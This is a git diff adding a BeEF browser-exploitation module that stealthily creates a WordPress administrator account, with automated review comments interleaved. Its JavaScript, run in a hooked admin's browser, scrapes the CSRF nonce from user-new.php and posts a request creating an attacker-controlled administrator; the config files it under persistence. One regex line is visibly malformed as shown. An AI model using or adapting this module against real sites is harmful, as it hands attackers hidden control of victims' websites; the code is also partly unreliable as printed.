diff --git a/modules/exploits/wordpress_add_admin/command.js b/modules/exploits/wordpress_add_admin/command.js
new file mode 100644
index 000000000..60a21f5ef
--- /dev/null
+++ b/modules/exploits/wordpress_add_admin/command.js
@@ -0,0 +1,74 @@
+//
+// Copyright (c) 2015 Daniel Reece - @HBRN8
+//
+
+beef.execute(function() {
+
+function g(u){ x=new XMLHttpRequest(); x.open('GET',u,false); x.send(null); return x.responseText; }
+function p(u, b){ x=new XMLHttpRequest(); x.open('POST',u,true); x.setRequestHeader("Content-type","application/x-www-form-urlencoded"); x.send(b); return x.responseText; }
+/* Kept incase there is a valid reason to use forms over AJAX, I cant think of any.
+function post(path, params, method) {
+ method = method || "post";
+ var form = document.createElement("form");
+ form.setAttribute("method", method);
+ form.setAttribute("action", path);
+
+ for(var key in params) {
+ if(params.hasOwnProperty(key)) {
+ var hiddenField = document.createElement("input");
+ hiddenField.setAttribute("type", "hidden");
+ hiddenField.setAttribute("name", key);
+ hiddenField.setAttribute("value", params[key]);
+ form.appendChild(hiddenField);
+ }
+ }
+ document.body.appendChild(form);
+ form.submit();
+}
+*/
+
+var domail = '<%= @domail %>';
+
+page = g("/wp-admin/user-new.php");
+
+m = page.match(/\-user" value="(.*?)" \/>", <%= @command_id %>, "CSRF nonce hijacked = " + m[1] +
+"\nCreating admin... (<%== format_multiline(@user + ':' + @pass) %>)");
+
+var blob = "action=createuser" +
+"&_wpnonce_create-user=" + m[1] +
+"&_wp_http_referer=%2Fwp-admin%2Fuser-new.php" +
+"&user_login=<%== format_multiline(@user) %>" +
+"&email=<%== format_multiline(@email) %>" +
+"&first_name=<%== format_multiline(@fname) %>" +
+"&last_name=<%== format_multiline(@lname) %>" +
+"&url=<%== format_multiline(@url) %>" +
+"&pass1=<%== format_multiline(@pass) %>" +
+"&pass2=<%== format_multiline(@pass) %>";
+if (domail){
+//Wordpress will mail regardless of param value if it exists.
+blob = blob + "&send_password=1";
+}
+blob = blob + "&role=administrator&createuser=Add+New+User";
+
+p("/wp-admin/user-new.php", blob);
+
+/* Still cant think of any. 
+post('/wp-admin/user-new.php',
+{action: 'createuser',
+ '_wpnonce_create-user': m[1],
+ _wp_http_referer: '%2Fwp-admin%2Fuser-new.php',
+ user_login: '<%== format_multiline(@user) %>',
+ email: '<%== format_multiline(@email) %>',
+ first_name: '<%== format_multiline(@fname) %>',
+ last_name: '<%== format_multiline(@lname) %>',
+ url: '<%== format_multiline(@url) %>',
+ pass1: '<%== format_multiline(@pass) %>',
+ pass2: '<%== format_multiline(@pass) %>',
+ send_password: '1',
+ role: 'administrator',
+ createuser: 'Add+New+User+'});
+*/
+
+});
\ No newline at end of file
diff --git a/modules/exploits/wordpress_add_admin/config.yaml b/modules/exploits/wordpress_add_admin/config.yaml
new file mode 100644
index 000000000..d9999117e
--- /dev/null
+++ b/modules/exploits/wordpress_add_admin/config.yaml
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2015 Daniel Reece - @HBRN8
+#
+
+beef:
+ module:
+ Wordpress_add_admin:
+ enable: true
+ category: "Persistence"
+ name: "Wordpress Add Administrator"
+ description: "This module stealthily adds a Wordpress administrator account"
+ authors: ["hiburn8 @hbrn8"]
+ target:
+ working: ["ALL"]
\ No newline at end of file
diff --git a/modules/exploits/wordpress_add_admin/module.rb b/modules/exploits/wordpress_add_admin/module.rb
new file mode 100644
index 000000000..cf418b508
--- /dev/null
+++ b/modules/exploits/wordpress_add_admin/module.rb
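Review bot: `if (domail){` tests the truthiness of a string literal rendered by the template, so unless an unchecked box renders as the empty string the `send_password=1` branch runs in every case; if the option renders as `'true'`/`'false'`, the check should be `if (domail === 'true') {`. The XHR helpers assign `x` without `var`, and `page` and `m` are likewise undeclared, so all three become implicit globals on the hooked page; `var x = new XMLHttpRequest();`, `var page = ...`, `var m = ...` would keep them local. `p()` opens its request asynchronously (`x.open('POST',u,true)`) and then returns `x.responseText` immediately, so its return value is always empty — either drop the return or make the intent explicit with a comment. The two commented-out `post()` blocks are dead code and should be removed rather than kept with the "cant think of any" notes. The `page.match(...)` line appears unbalanced as rendered here (the regex has no closing `/` before the `<%= @command_id %>` argument list), which may be an artifact of this page rather than of the committed file.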
@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2015 Daniel Reece - @HBRN8
+
+class Wordpress_add_admin < BeEF::Core::Command
+
+ def self.options
+ return [{'name'=>'user', 'ui_label' => 'Username:', 'value' => 'beef'},
+ {'name'=>'pass', 'ui_label' => 'Pwd:', 'value' => [*('a'..'z'),*('0'..'9')].shuffle[0,8].join},
+ {'name'=>'email', 'ui_label' => 'Email:', 'value' => ''},
+ {'name'=>'domail', 'type' => 'checkbox', 'ui_label' => 'Success mail?:', 'checked' => 'true'},
+ {'name'=>'url', 'ui_label' => 'Website:', 'value' => 'beefproject.com'},
+ {'name'=>'fname', 'ui_label' => 'FirstName:', 'value' => 'beef'},
+ {'name'=>'lname', 'ui_label' => 'LastName:', 'value' => 'project'}]
+ end
+
+ def post_execute
+ end
+
+end
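Review bot: `post_execute` is defined with an empty body and no comment, so a reader cannot tell whether the no-op is deliberate; either add `# Results are reported by the command itself; nothing to post-process.` or drop the method so the base class behaviour applies (whether the base class defines a default is not visible here). The explicit `return` in `self.options` is unidiomatic Ruby — the array literal is the method's last expression and is returned as-is. `'checked' => 'true'` passes the checkbox state as a string while the other options use typed defaults; it is worth confirming against the UI layer whether a boolean `true` is expected, since the JS side compares the rendered value as a string.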